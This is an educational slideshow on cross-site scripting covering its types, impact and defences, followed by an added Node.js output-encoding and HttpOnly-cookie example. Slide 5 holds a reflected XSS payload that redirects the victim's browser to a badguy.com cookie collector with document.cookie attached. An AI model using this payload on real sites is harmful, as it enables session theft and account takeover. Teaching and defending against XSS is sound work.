
Xss (cross site scripting)


  1. (Title slide: no text was extracted)
  2. Agenda:
     - What is XSS (Cross Site Scripting)?
     - Types of XSS (Cross Site Scripting)
     - What is the impact of Cross Site Scripting?
     - How can we protect applications against XSS?
  3. What is XSS? Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages.
     - Embedded in the HTML page
     - Supports different languages (JavaScript, VBScript, ActiveX, etc.); most prominent: JavaScript
     - Attacker "makes" the Web server deliver malicious script code
     - Malicious script is executed in the client's Web browser
     - Scripting: Web browsers can execute commands
     - Cross-site: foreign script sent via the server to the client
     - Caused by insufficient input validation
  4. Three types of XSS:
     - Reflected XSS (Non-Persistent): link in another website or e-mail
     - Stored XSS (Persistent): forum, bulletin board, feedback form
     - Local XSS: PDF in Adobe Reader, Flash Player
  5. Reflected XSS (Non-Persistent):
     - Malicious content does not get stored on the server
     - The server bounces the original input back to the victim without modification
     Diagram: the attacker (www.badguy.com, running a cookie collector) sends the victim an e-mail with <script> tags embedded in a link; the victim follows the link and the script executes:
     http://mybank.com/account.php?variable="> <script>document.location='http://badguy.com/cgi-bin/cookie.cgi'"%20+document.cookie</script>
  6. Stored XSS (Persistent). Diagram with attacker, Web server and client:
     1. Attacker sends malicious code: posts a forum message with Subject "GET Money for FREE !!!" and Body "<script> attack code </script>"
     2. Server stores the message among the other forum threads ("Error message on startup", "Re: Error message on startup", "Did you know this?", "I found a solution!", "Can anybody help?")
     3. User requests the message: GET /forum.jsp?fid=122&mid=2241
     4. Message is delivered by the server, still containing "<script> attack code </script>"
     5. Browser executes the script in the message
  7. Local XSS: the injected script does not traverse to the server.
  8. What is the impact of XSS?
     - Normal users: access to authentication credentials for the Web application
       - Access to personal data (credit card, bank account)
       - Access to business data (bid details, construction details)
       - Misuse of the account (order expensive goods)
     - High-privileged users:
       - Control over the Web application
       - Control / access: Web server machine
       - Control / access: backend / database systems
  9. Impact (continued):
     - Denial of service: crash the user's browser, pop-up flooding, redirection
     - Access to the user's machine: upload local data to the attacker's machine
  10. How can we protect applications against XSS?
      - Client side: disable JS; verify e-mail; always update
      - Server side: input validation; encode all meta characters sent to the client; keep track of user sessions; Web application firewall; always test
  11. (Closing slide: no text was extracted)
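The slides show the stored (slide 6) and reflected (slide 5) cases as diagrams and list "encode all meta characters sent to the client" and "keep track of user sessions" as server-side defences (slide 10) without showing code. The following is an added example, not code from the slideshow or its author: a small Node.js script that renders a forum post and an echoed query parameter first unsafely and then with HTML output encoding, plus a session cookie built with the HttpOnly flag so the slide 5 `document.cookie` payload has nothing to read. The function names, the `escapeHtml` encoder, the `sessionCookieHeader` helper and the sample post and URL are all assumptions constructed for this example; the payload body is a harmless comment standing in for the slides' "attack code".

```javascript
// Added example (not from the slides): server-side output encoding for the
// stored (slide 6) and reflected (slide 5) XSS cases, plus an HttpOnly
// session cookie. Runs under Node.js with no dependencies.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Encode the HTML meta characters so the browser renders them as text.
// Covers HTML body content and double-quoted attribute values only; other
// contexts (inline JavaScript, URLs, CSS) need their own encoders.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Stored XSS, vulnerable: the forum post is concatenated into the page as-is,
// so a <script> tag stored in the body is delivered live to every reader.
function renderPostUnsafe(post) {
  return `<h2>${post.subject}</h2>\n<div class="body">${post.body}</div>`;
}

// Stored XSS, hardened: every untrusted field is encoded at output time.
function renderPostSafe(post) {
  return `<h2>${escapeHtml(post.subject)}</h2>\n<div class="body">${escapeHtml(post.body)}</div>`;
}

// Reflected XSS, vulnerable: a query parameter is echoed into an attribute
// value, so a leading quote closes the attribute and the rest becomes markup.
function renderFormUnsafe(requestUrl) {
  const variable = new URL(requestUrl).searchParams.get('variable') ?? '';
  return `<input name="variable" value="${variable}">`;
}

// Reflected XSS, hardened: same page, parameter encoded for attribute context.
function renderFormSafe(requestUrl) {
  const variable = new URL(requestUrl).searchParams.get('variable') ?? '';
  return `<input name="variable" value="${escapeHtml(variable)}">`;
}

// Session handling (slide 10): a cookie flagged HttpOnly is not exposed via
// document.cookie, so script that does slip through cannot read the session
// id. Hypothetical helper; the Set-Cookie attributes themselves are standard.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Check a test suite can run over rendered pages: is a live <script> tag
// still present in the output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample inputs modelled on slides 5 and 6.
const STORED_POST = {
  subject: 'GET Money for FREE !!!',
  body: '<script>/* attack code */</script>',
};
const REFLECTED_URL =
  'http://mybank.example/account.php?variable="><script>/* attack code */</script>';

console.log('unsafe stored    :', renderPostUnsafe(STORED_POST));
console.log('safe stored      :', renderPostSafe(STORED_POST));
console.log('unsafe reflected :', renderFormUnsafe(REFLECTED_URL));
console.log('safe reflected   :', renderFormSafe(REFLECTED_URL));
console.log('Set-Cookie       :', sessionCookieHeader('constructed-session-id'));
```

The design point is that encoding happens where the data is written into the page, not where it is received: the same stored post can be rendered safely by one template and unsafely by another, which is why input validation alone (slide 10, server side) is not sufficient and why the encoder must match the output context (body text, attribute value, script, URL).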
